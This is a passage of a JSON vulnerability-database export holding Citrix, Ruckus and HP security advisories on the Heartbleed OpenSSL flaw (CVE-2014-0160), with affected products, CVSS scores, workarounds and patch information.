underlying web server. Citrix customers are advised to verify that any deployed web servers used to host Web Interface are not vulnerable to this issue. Web Interface can also use a built-in TLS library to make outgoing TLS connections, this library is not vulnerable to CVE-2014-0160.\n \u2022 Citrix CloudPortal Business Manager: This product does not include any TLS libraries and, as such, is not vulnerable to CVE-2014-0160. Some customer deployments may make use of an additional SSL proxy component; Citrix advises customers to contact the vendors of any SSL proxy components being used to determine if they are vulnerable to CVE-2014-0160.\n</ul>\n Products That Are Not Impacted:\n<ul>\n \u2022 Citrix Provisioning Services: Currently supported versions of Citrix Provisioning Services are not affected by CVE-2014-0160.\n \u2022 Citrix XenServer: The TLS libraries used by currently supported versions of XenServer are not vulnerable to CVE-2014-0160.\n \u2022 Citrix VDI-in-a-Box: The TLS libraries used by currently supported versions of VIAB are not vulnerable to CVE-2014-0160.\n \u2022 Citrix XenMobile MDM Edition: The TLS libraries used by components of XenMobile MDM edition, including the XenMobile Device Manager component, are not vulnerable to CVE-2014-0160.\n \u2022 Citrix CloudPortal Services Manager: The TLS libraries used by currently supported versions of CloudPortal Services Manager are not vulnerable to CVE-2014-0160.\n \u2022 Citrix Receiver for Windows: The TLS libraries used by currently supported versions of Receiver for Windows are not vulnerable to CVE-2014-0160.\n \u2022 Citrix Receiver for Mac: The TLS libraries used by currently supported versions of Receiver for Mac are not vulnerable to CVE-2014-0160.\n \u2022 Citrix Receiver for iOS: The TLS libraries used by currently supported versions of Receiver for iOS are not vulnerable to CVE-2014-0160.\n \u2022 Citrix ByteMobile: The TLS libraries used by currently supported versions of ByteMobile are not vulnerable to CVE-2014-0160.\n \u2022 Citrix NetScaler: The TLS libraries used by currently supported versions of the NetScaler product are not vulnerable to CVE-2014-0160.\n \u2022 Citrix Access Gateway: The TLS libraries used by currently supported versions of Access Gateway are not vulnerable to CVE-2014-0160.\n \u2022 Citrix CloudBridge: The TLS libraries used by currently supported versions of Citrix CloudBridge, including client components, are not vulnerable to CVE-2014-0160.\n \u2022 Citrix Secure Gateway (CSG): The TLS library used by the currently supported version of CSG is not vulnerable to CVE-2014-0160.\n \u2022 Citrix XenApp SSLRelay Component: The TLS libraries used by currently supported versions of the XenApp SSLRelay are not vulnerable to CVE-2014-0160.\n \u2022 Citrix Single Sign-on, previously known as Password Manager: The TLS libraries used by currently supported versions of Citrix Single Sign-on are not vulnerable to CVE-2014-0160.\n \u2022 Citrix StoreFront: The TLS library used by currently supported versions of Citrix Storefront is not vulnerable to CVE-2014-0160.\n \u2022 Citrix Merchandising Server: The TLS library used by the currently supported version of Citrix Merchandising Server is not vulnerable to CVE-2014-0160.\n</ul>\n Obtaining Support on This Issue\n If you require technical assistance with this issue, please contact Citrix Technical Support. Contact details for Citrix Technical Support are available at <a href=\"http://www.citrix.com/site/ss/supportContacts.asp\">http://www.citrix.com/site/ss/supportContacts.asp</a>. More information on the support status of Citrix products can be found on our website at the following address: <a href=\"http://www.citrix.com/support/product-lifecycle/product-matrix.html\">http://www.citrix.com/support/product-lifecycle/product-matrix.html</a>.\n Reporting Security Vulnerabilities to Citrix\n Citrix welcomes input regarding the security of its products and considers any and all potential vulnerabilities seriously. Citrix welcomes input regarding the security of its products and considers any and all potential vulnerabilities seriously. For guidance on how to report security-related issues to Citrix, please see the following document: CTX081743 \u2013 <a href=\"/article/CTX081743\">Reporting Security Issues to Citrix</a>\n</div>\n</div></div>\n</section>", "edition": 2, "modified": "2019-08-15T04:00:00", "published": "2014-04-09T04:00:00", "id": "CTX140605", "href": "https://support.citrix.com/article/CTX140605", "title": "CVE-2014-0160 - Citrix Security Advisory for the Heartbleed vulnerability", "type": "citrix", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:51", "bulletinFamily": "software", "cvelist": ["CVE-2014-0160"], "description": "\r\n\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nRUCKUS ADVISORY ID 041414\r\n\r\nCustomer release date: April 14, 2014\r\nPublic release date: April 14, 2014\r\n\r\nTITLE\r\n\r\nOpenSSL 1.0.1 library's "Heart bleed" vulnerability - CVE-2014-0160\r\n\r\n\r\nSUMMARY\r\n\r\nOpenSSL library is used in Ruckus products to implement various\r\nsecurity related features. A vulnerability has been discovered in\r\nOpenSSL library which may allow an unauthenticated, remote attacker to\r\nretrieve memory in chunks of 64 kilobytes from a connected client or\r\nserver. An exploit could disclose portions of memory containing\r\nsensitive security material such as passwords and private keys.\r\n\r\n\r\nAFFECTED SOFTWARE VERSIONS AND DEVICES\r\n\r\n\r\n Device Affected software\r\n- --------------------- ------------------\r\nSmart Cell Gateway 1.1.x\r\nSmartCell Access Points NOT AFFECTED\r\nZoneDirector Controllers NOT AFFECTED\r\nZoneFlex Access Points NOT AFFECTED\r\n\r\n\r\nAny products or services not mentioned in the table above are not affected\r\n\r\n\r\nDETAILS\r\n\r\nA vulnerability has been discovered in the popular OpenSSL\r\ncryptographic software library. This weakness exists in OpenSSL's\r\nimplementation of the TLS/DTLS (transport layer security protocols)\r\nheartbeat extension (RFC6520). This vulnerability is due to a missing\r\nbounds check in implementation of the handling of the heartbeat\r\nextension. When exploited, this issue may lead to leak of memory\r\ncontents from the server to the client and from the client to the\r\nserver. These memory contents could contain sensitive security\r\nmaterial such as passwords and private keys.\r\n\r\n\r\nIMPACT\r\n\r\nRuckus devices incorporate OpenSSL library to implement various\r\nsecurity related features. Below is list of the affected components:\r\n\r\n- - Administrative HTTPS Interface (Port 8443)\r\n\r\n\r\nCVSS v2 Base Score:5.0 (MEDIUM) (AV:N/AC:L/Au:N/C:P/I:N/A:N)\r\n\r\n\r\n \r\nWORKAROUNDS\r\n\r\nRuckus recommends that all customers apply the appropriate patch(es)\r\nas soon as practical. However, in the event that a patch cannot\r\nimmediately be applied, the following suggestions might help reduce\r\nthe risk:\r\n\r\n - Do not expose administrative interfaces of Ruckus devices to\r\nuntrusted networks such as the Internet.\r\n\r\n - Use a firewall to limit traffic to/from Ruckus device's\r\nadministrative interface to trusted hosts.\r\n\r\n \r\n\r\nSOLUTION\r\n\r\nRuckus recommends that all customers apply the appropriate patch(es)\r\nas soon as practical.\r\n\r\nThe following software builds have the fix (any later builds will also\r\nhave the fix):\r\n\r\n\r\nBranch Software Build\r\n- ------- ------------------\r\n1.1.x 1.1.2.0.142\r\n\r\n\r\n\r\n\r\nDISCOVERY\r\n\r\nThis vulnerability was disclosed online on various sources :\r\n\r\n- - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160\r\n- - https://www.openssl.org/news/secadv_20140407.txt\r\n- - http://heartbleed.com/\r\n\r\n\r\n\r\n\r\nOBTAINING FIXED FIRMWARE\r\n\r\nRuckus customers can contact Ruckus support to obtain the fixed firmware\r\n\r\nRuckus Support contact list is at:\r\n https://support.ruckuswireless.com/contact-us\r\n\r\n\r\nPUBLIC ANNOUNCEMENTS\r\n\r\nThis security advisory will be made available for public consumption\r\non April 14, 2014 at the following source\r\n\r\nRuckus Website\r\nhttp://www.ruckuswireless.com/security\r\n\r\nSecurityFocus Bugtraq\r\nhttp://www.securityfocus.com/archive/1\r\n\r\n\r\nFuture updates of this advisory, if any, will be placed on Ruckus's\r\nwebsite, but may or may not be actively announced on mailing lists.\r\n\r\nREVISION HISTORY\r\n\r\n Revision 1.0 / 14th April 2014 / Initial release\r\n\r\n\r\nRUCKUS WIRELESS SECURITY PROCEDURES\r\n\r\nComplete information on reporting security vulnerabilities in Ruckus\r\nWireless\r\nproducts, obtaining assistance with security incidents is available at\r\n http://www.ruckuswireless.com/security\r\n \r\n \r\nFor reporting new security issues, email can be sent to\r\nsecurity(at)ruckuswireless.com\r\nFor sensitive information we encourage the use of PGP encryption. Our\r\npublic keys can be\r\nfound at http://www.ruckuswireless.com/security\r\n\r\n \r\nSTATUS OF THIS NOTICE: Final\r\n\r\nAlthough Ruckus cannot guarantee the accuracy of all statements\r\nin this advisory, all of the facts have been checked to the best of our\r\nability. Ruckus does not anticipate issuing updated versions of\r\nthis advisory unless there is some material change in the facts. Should\r\nthere be a significant change in the facts, Ruckus may update this\r\nadvisory.\r\n\r\n\r\n(c) Copyright 2014 by Ruckus Wireless\r\nThis advisory may be redistributed freely after the public release\r\ndate given at\r\nthe top of the text, provided that redistributed copies are complete and\r\nunmodified, including all date and version information.\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG/MacGPG2 v2.0.18 (Darwin)\r\nComment: GPGTools - http://gpgtools.org\r\nComment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/\r\n\r\niQEcBAEBAgAGBQJTTBeuAAoJEFH6g5RLqzh1fRsIAJ9MtudIbdzR7mm/hP0i7boN\r\nMqlHAnFWai1c99UX048I9PSwWzWuEj4/1E4jy4vQqxLG8gO0YbAQiGq4DDGErCU0\r\nAywV+p3Xlcn0SXp0vse/qnhOT0jVOOKXPZSokmoptQXbd28ZOYtGfMJozTvPh2vf\r\nAvGq2B5kciGVhvBc9hdHGhSla/xUr/puIOBKFtNfMuxPujJ62t8g07w2HCB51PL/\r\n5E5MrP4540n3ONZ9+w5h/AeVfvVXsFv25VuElckq6Anzm+iqNRjcWHdync14UqPx\r\n2kXr1E72zRYbY/Z7+QkQuL1REkka+RtGcwbo05u+aEUnPx3E9wvdCHjf6XhxcbI=\r\n=sbsc\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "modified": "2014-04-20T00:00:00", "published": "2014-04-20T00:00:00", "id": "SECURITYVULNS:DOC:30472", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30472", "title": "RUCKUS ADVISORY ID 041414: OpenSSL 1.0.1 library's "Heart bleed" vulnerability - CVE-2014-0160", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:52", "bulletinFamily": "software", "cvelist": ["CVE-2014-0160"], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04275280\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04275280\r\nVersion: 1\r\n\r\nHPSBMU03037 rev.1 - HP Multimedia Service Environment (MSE), (HP Network\r\nInteractive Voice Response (NIVR)), Remote Disclosure of Information\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-05-06\r\nLast Updated: 2014-05-06\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP Multimedia\r\nService Environment (MSE), formerly known as HP Network Interactive Voice\r\nResponse (NIVR). This is the OpenSSL vulnerability known as "Heartbleed"\r\nwhich could be exploited remotely resulting in disclosure of information.\r\n\r\nReferences:\r\nCVE-2014-0160, SSRT101551\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP Multimedia Service Environment (MSE) 2.1.1\r\nHP Network Interactive Voice Response (NIVR) 2.1.0, Reactive Patches 001,\r\n002, 003\r\nHP Network Interactive Voice Response (NIVR) 2.0.7, Reactive Patch 003\r\n\r\nOnly the MSE (ACM TMP) database set up with Replication using SSL is impacted\r\nfor the above versions. No other product interfaces are impacted. To\r\ndetermine if replication with SSL is set up, check if the USE_SSL line is\r\nuncommented in the file /etc/opt/OC/hpoc-nivr/nivr.properties\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP is actively working to address this vulnerability for the impacted product\r\nversions. This bulletin will be revised when the software updates are\r\nreleased.\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 6 May 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.13 (GNU/Linux)\r\n\r\niEYEARECAAYFAlNo/M4ACgkQ4B86/C0qfVl/5ACg4XO1B8jH2hYGdXEzhKUgYHnh\r\nY14AoJo2Z5A+GdPcbqNB7yMOoAkN+O5h\r\n=066r\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "modified": "2014-05-07T00:00:00", "published": "2014-05-07T00:00:00", "id": "SECURITYVULNS:DOC:30696", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30696", "title": "[security bulletin] HPSBMU03037 rev.1 - HP Multimedia Service Environment (MSE), (HP Network Interactive Voice Response (NIVR)), Remote Disclosure of Information", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "bulletinFamily": "software", "cvelist": ["CVE-2014-0160"], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04240206\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04240206\r\nVersion: 1\r\n\r\nHPSBST03001 rev.1 - HP XP P9500 Disk Array running OpenSSL, Remote Disclosure\r\nof Information\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-15\r\nLast Updated: 2014-04-15\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP XP P9500 Disk\r\nArray running OpenSSL.This is the OpenSSL vulnerability known as "Heartbleed"\r\nwhich could be exploited remotely resulting in disclosure of information.\r\n\r\nReferences: CVE-2014-0160, SSRT101506\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP XP P9500 Disk Array OSS 70-06-00/00 and 70-06-01/00 when running Apache\r\n2.2.24\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP is actively working to address this vulnerability for the impacted\r\nversions of HP XP P9500 Disk Array. This bulletin will be revised when the\r\nsoftware updates are released.\r\n\r\nThe two versions of Apache available in OSS 70-06-00/00 and 70-06-01/00 are:\r\n\r\nApache 2.2.10 (with OpenSSL 0.9.8o) which is not impacted by CVE-2014-0160\r\nApache 2.2.24 (with OpenSSL 1.0.1e) which is impacted by CVE-2014-0160\r\n\r\nUntil a new version is available, keep the SVP(s) on an array on the earlier\r\nversion of Apache available from the OSS image (version 2.2.10)\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 15 April 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v2.0.19 (GNU/Linux)\r\n\r\niEYEARECAAYFAlNNOSEACgkQ4B86/C0qfVl7IwCcCAFossT9cI/G1w8Zjt125fWa\r\nwwQAnR+wDpUBjcU/REah/pNV80/+VNeR\r\n=Do3J\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "modified": "2014-04-20T00:00:00", "published": "2014-04-20T00:00:00", "id": "SECURITYVULNS:DOC:30478", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30478", "title": "[security bulletin] HPSBST03001 rev.1 - HP XP P9500 Disk Array running OpenSSL, Remote Disclosure of Information", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "bulletinFamily": "software", "cvelist": ["CVE-2014-0160"], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04239374\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04239374\r\nVersion: 1\r\n\r\nHPSBMU02999 rev.1 - HP Software Autonomy WorkSite Server (On-Premises\r\nSoftware), Running OpenSSL, Remote Disclosure of Information\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-15\r\nLast Updated: 2014-04-15\r\n\r\nPotential Security Impact: Remote disclosure of Information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential vulnerability exists in HP Autonomy WorkSite Server (on-premises\r\nsoftware) running OpenSSL. The vulnerability can be exploited to allow remote\r\ndisclosure of information.\r\n\r\nThe Heartbleed vulnerability was detected in specific OpenSSL versions.\r\nOpenSSL is a 3rd party product that is embedded with some of HP Software\r\nproducts. This bulletin objective is to notify HP Software customers about\r\nproducts affected by the Heartbleed vulnerability.\r\n\r\nNote: The Heartbleed vulnerability (CVE-2014-0160) is a vulnerability found\r\nin the OpenSSL product cryptographic software library product. This weakness\r\npotentially allows disclosure of information protected, under normal\r\nconditions, by the SSL/TLS protocol. The impacted products appear in the list\r\nbelow are vulnerable due to embedding OpenSSL standard release software.\r\n\r\nReferences:\r\nCVE-2014-0160 (SSRT101505)\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP Autonomy WorkSite Server v9.0 SP1 (on-premises software)\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP has provided an update to HP Autonomy WorkSite Server v9.0 SP1\r\n(on-premises software) that will address the OpenSSL vulnerability. https://w\r\norksitesupport.autonomy.com/worksite/Scripts/GetDoc.aspx?latest=0%26nrtid=!nr\r\ntdms:0:!session:10.253.1.101:!database:SUPPORT:!document:1351832,1\r\n\r\nNote: after applying the update, HP recommends these additional steps to\r\nassure the vulnerability is addressed.\r\n\r\nRevoke old key pairs that were just superseded\r\nChange all potentially affected passwords\r\nInvalidate all session keys and cookies\r\n\r\nBulletin Applicability:\r\n\r\nThis bulletin applies to each OpenSSL component that is embedded within HP\r\nAutonomy WorkSite Server (on-premises Software). The bulletin does not apply\r\nto any other 3rd party application (e.g. operating system, web server, or\r\napplication server) that may be required to be installed by the customer\r\naccording instructions in the product install guide.\r\n\r\nTo learn more about HP Software Incident Response, please visit http://www8.h\r\np.com/us/en/software-solutions/enterprise-software-security-center/response-c\r\nenter.html .\r\n\r\nSoftware updates are available from HP Software Support Online at\r\nhttp://support.openview.hp.com/downloads.jsp\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 15 April 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.13 (GNU/Linux)\r\n\r\niEYEARECAAYFAlNNn1wACgkQ4B86/C0qfVm/sQCg+dFq6zytvlfYlmexvErif+Bg\r\nZooAnRDUeVqwXlt8KEGyQrnGheC43CH0\r\n=6WRm\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "modified": "2014-04-20T00:00:00", "published": "2014-04-20T00:00:00", "id": "SECURITYVULNS:DOC:30480", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30480", "title": "[security bulletin] HPSBMU02999 rev.1 - HP Software Autonomy WorkSite Server (On-Premises Software), Running OpenSSL, Remote Disclosure of Information", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "bulletinFamily": "software", "cvelist": ["CVE-2014-0160"], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04239372\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04239372\r\nVersion: 1\r\n\r\nHPSBMU02998 rev.1 - HP System Management Homepage (SMH) running OpenSSL on\r\nLinux and Windows, Remote Disclosure of Information\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-13\r\nLast Updated: 2014-04-13\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP System\r\nManagement Homepage (SMH) running on Linux and Windows. This is the OpenSSL\r\nvulnerability known as "Heartbleed" which could be exploited remotely\r\nresulting in disclosure of information.\r\n\r\nReferences: CVE-2014-0160, SSRT101501\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP System Management Homepage (SMH) v7.1.2, v7.2, v7.2.1, v7.2.2, v7.3,\r\nv7.3.1 for Linux and Windows\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP is actively working to address this vulnerability for the impacted\r\nversions of HP System Management Homepage (SMH). This bulletin will be\r\nrevised when the software updates are released.\r\n\r\nInformation and downloads for HP SMH can be found at the following location:\r\n\r\nhttp://h18013.www1.hp.com/products/servers/management/agents/index.html\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 13 April 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this 